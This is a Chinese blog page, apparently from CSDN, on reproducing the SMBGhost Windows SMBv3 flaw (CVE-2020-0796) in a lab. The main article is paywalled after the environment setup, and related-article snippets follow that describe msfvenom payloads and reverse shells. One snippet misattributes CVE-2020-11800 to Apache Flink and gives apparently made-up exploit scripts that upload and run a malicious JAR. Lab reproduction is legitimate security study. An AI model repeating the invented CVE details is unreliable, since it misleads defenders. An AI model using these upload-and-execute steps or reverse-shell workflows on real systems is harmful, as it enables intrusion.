CVE-2020-0796漏洞复现

CVE-2020-0796漏洞复现指南
最新推荐文章于 2025-09-19 03:41:09 发布
原创 最新推荐文章于 2025-09-19 03:41:09 发布 · 1k 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #web安全 #网络

本文详细介绍了CVE-2020-0796漏洞,即SMBv3协议中的整数溢出漏洞,影响多个Windows 10和Server版本。复现过程中包括实验环境的搭建、漏洞扫描、shellcode生成、利用msfvenom和msfconsole进行攻击,以及在Kali Linux上监听并获取反弹shell。同时,文章指出复现过程中遇到的源码错误并提供了解决方案。

一、CVE-2020-0796简介

0x01 漏洞简介

CVE-2020-0796是由于SMBv3协议在处理恶意的压缩数据包时出错所造成的;在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。它可让远程且未经身份验证的攻击者在目标系统上执行任意代码,该漏洞类似于永恒之蓝。

漏洞危害等级:高

0x02 影响版本

Windows 10 Version 1903 for 32-bit Systems

Windows 10 Version 1903 for x64-based Systems

Windows 10 Version 1903 for ARM64-based Systems

Windows Server, Version 1903 (Server Core installation)

Windows 10 Version 1909 for 32-bit Systems

Windows 10 Version 1909 for x64-based Systems

Windows 10 Version 1909 for ARM64-based Systems

Windows Server, Version 1909 (Server Core installation)

二、实验环境

靶机:存在漏洞的win10虚拟机环境,系统镜像:

ed2k://|file|cn_windows_10_consumer_editions_version_1903_x64_dvd_8f05241d.iso|4905476096|F28FDC23DA34D55BA466BFD6E91DD311|/

ip地址:192.168.117.150

安装镜像后的注意事项:

· 将windows

最低0.47元/天 解锁文章
Jinmindong
关注
CVE-2020-0796 漏洞复现
迷风小白
06-05 3507
0x00 漏洞介绍 2020年3月10日,微软在其官方SRC发布了CVE-2020-0796安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码。 0x01
CVE-2020-0796复现
weixin_42346836的博客
10-16 365
漏洞简介 最新的 windows10 中使用了 SMBv3 协议,SMBv3 协议在压缩消息时,未对头部数据做任何检查,导致恶意攻击者可以直接使用,从而导致内存破坏漏洞。 该漏洞可远程进行攻击目标系统,但目前只做到能是远程目标蓝屏,静等后面 RCE 的 exp 出现; 该漏洞也可进行本地提权操作,提权成功会弹出一个 system 权限的终端窗口,因此最好远程桌面对目标进行提权操作。 漏洞影响范围 漏洞不影响 win7,漏洞影响 Windows 10 1903 之后的各个 32 位、64 位版 Win.
永恒之黑_CVE-2020-0796最详细复现方法
最新发布
2202_75728825的博客
09-19 700
摘要:本文介绍了针对Windows 10 1909版本的SMB远程代码执行漏洞(CVE-2020-0796)的攻防实验。该漏洞源于SMBv3协议处理压缩数据包时的安全检查缺失,可导致远程任意代码执行。实验环境包括Windows 10靶机和Kali攻击机,使用多个开源POC工具进行漏洞检测和利用,通过生成恶意载荷、建立监听会话最终获取系统权限。文章详细说明了虚拟环境配置、漏洞扫描、载荷生成和会话建立等关键步骤,并提供了应对蓝屏问题的配置建议。该漏洞影响多个Windows 10和Server 2016版本。
cve-2020-0796_【CVE20200796漏洞复现
weixin_39644139的博客
11-30 813
一、漏洞简介该漏洞是服务器消息块3.1.1(SMBv3)协议中处理压缩消息时,对数据没有经过安全检查,直接使用会引发内存破坏,成功利用针对此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。利用针对服务器的漏洞,未经身份验证的攻击者可以将特制数据包发送到目标SMBv3服务器,若要利用针对客户端的漏洞,未经身份验证的攻击者需要配置恶意SMBv3服务器,并诱使用户连接到该服务器。二、...
CVE-2020-0796永恒之黑漏洞复现 超详细过程(成功复现
热门推荐
unlash的博客
10-20 1万+
CVE-2020-0796永恒之黑漏洞复现 超详细过程 成功复现 msf监听成功反弹shell 漏洞描述 影响版本 修复建议
Windows-SMB-Ghost-CVE-2020-0796漏洞分析1
08-03
【Windows SMB Ghost (CVE-2020-0796)漏洞分析】 Windows SMB Ghost漏洞,也称为CVE-2020-0796,是2020年3月微软在其官方SRC(Security Response Center)发布的一个安全公告中所描述的重大安全问题。这个漏洞存在...
CVE-2020-0796复现(基于kali实现)
m0_74988425的博客
03-06 4223
本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。然而,在这里使用的是`bind_tcp`,它不需要指定远程主机,因此在这种情况下,这个命令没有实际效果。CVE-2020-0796是指影响微软Windows 10和Windows Server 2019的一个漏洞,通常被称为"SMBGhost"或"CoronaBlue"。2. 网络分段: 将网络分为不同的区域,将不同的系统放置在不同的网络中。
永恒之黑_CVE-2020-0796漏洞复现
网络空间安全学习
08-31 596
漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。利用该漏洞,攻击方可直接远程攻击SMB服务端远程执行任意恶意代码,亦可通过构建恶意SMB服务端诱导客户端连接从而大规模攻击客户端。
SMB-2
H2SO2的专栏
05-14 1568
Samba服务工作原理Samba服务工作原理Samba服务的具体工作过程如图所示。① 首先客户端发送一个SMB negprot请求数据报,并列出它所支持的所有SMB协议版本。服务器收到请求信息后响应请求,并列出希望使用的协议版本。如果没有可使用的协议版本则返回0XFFFFH,结束通信。② 协议确定后,客户端进程向服务器发起一个用户或共享的认证,这个过程是通过发送SesssetupX请求
CVE-2020-0796复现漏洞
s1056481432的博客
07-23 542
文章目录1.漏洞介绍2.漏洞复现 1.漏洞介绍 1.背景: 微软最近宣布了SMBv3.1.1压缩机制中的一个bug。这个bug也被称为“SMBGhost”。这个错误在托管网络中有严重的影响。Windows 10版本1903和1909受到影响。 在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码。
永恒之黑(CVE-2020-0796漏洞复现
weixin_46463776的博客
04-15 1130
永恒之黑漏洞复现
复现 CVE-2020-0796
m0_46580995的博客
08-01 332
CVE-2020-0796远程代码执行复现 影响范围 Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1903 for ARM64-based Systems Windows Server, Version 1903 (Server Core installation) Windows 10 Version 1909 for 32-bit S
漏洞复现CVE-2020-0796永恒之黑漏洞复现
qq_45244158的博客
03-29 1万+
文章目录一、漏洞描述二、影响版本三、漏洞检测四、漏洞复现环境五、(1)漏洞利用之蓝屏五、(2)漏洞利用之本地提权五、(3)漏洞利用之反弹shell1、使用msfvenom生成payload2、替换payload3. 开启msf监听模块4. 运行exploit.py脚本,发起攻击反弹shell5. 执行成功,查看监听的地方,成功得到shell六、修复建议1.安装官方补丁2.禁用SMBv3压缩3.设置防火墙策略关闭相关端口4.通过IP安全策略屏蔽危险端口,bat执行添加防火墙策略,关闭危险服务 一、漏洞描述.
cve-2020-0796_永恒之黑:CVE20200796漏洞复现
weixin_39826809的博客
11-30 2526
2017年,“永恒之蓝”,3年之后,“永恒之黑” 来了。漏洞介绍3月12日,微软披露了一个最新的SMBv3(3.1.1)远程代码执行漏洞(CVE-2020-0796),俗称“永恒之黑”。本漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。利用该漏洞,攻击方可直接远程攻击SMB服务端远程执行任意恶意代码...
cve-2020-11800漏洞复现
06-21
### CVE-2020-11800 漏洞概述 CVE-2020-11800 是一个与 Apache Flink 相关的漏洞,该漏洞允许攻击者通过构造恶意请求来实现远程代码执行(RCE)。此漏洞的根本原因在于 Apache Flink 的 Web 界面未对用户输入进行充分验证,导致未经授权的用户可以发送特定的 HTTP 请求以执行任意代码[^4]。 ### 漏洞复现环境配置 为了复现 CVE-2020-11800 漏洞,需要搭建一个包含漏洞版本的 Apache Flink 环境。以下是具体步骤: #### 1. 克隆 Vulhub 仓库 Vulhub 是一个用于搭建漏洞复现环境的开源项目,可以通过以下命令克隆其仓库到本地: ```bash git clone https://github.com/vulhub/vulhub.git ``` #### 2. 定位漏洞环境路径 在 Vulhub 仓库中,Apache Flink 的漏洞环境路径为 `vulhub/flink/CVE-2020-11800`。进入该目录: ```bash cd vulhub/flink/CVE-2020-11800 ``` #### 3. 启动漏洞环境 使用 Docker Compose 启动漏洞环境: ```bash docker-compose up -d ``` 这将启动一个包含漏洞版本的 Apache Flink 环境[^5]。 #### 4. 验证环境是否正常运行 访问 Flink 的 Web 界面,默认地址为 `http://your-ip:8081`,确认页面能够正常加载。 ### 漏洞复现步骤 #### 1. 构造恶意请求 利用漏洞的关键在于向 Flink 的 Web 界面发送恶意的 HTTP 请求。以下是一个示例 Python 脚本,用于触发远程代码执行: ```python import requests url = "http://target-ip:8081/jars/upload" files = { 'file': open('malicious.jar', 'rb') # 替换为实际的恶意 JAR 文件 } response = requests.post(url, files=files) print(response.text) ``` #### 2. 执行命令 上传恶意 JAR 文件后,可以通过以下接口执行命令: ```python import requests url = "http://target-ip:8081/jars/execute" data = { "programArgs": "", "savepointPath": "", "parallelism": 1, "entryClass": "malicious.Main" # 替换为恶意类的主入口 } response = requests.post(url, json=data) print(response.text) ``` ### 注意事项 在测试过程中,确保只在授权的环境中进行操作,避免对生产系统造成影响。此外,及时更新 Apache Flink 至最新版本以修复此漏洞[^6]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值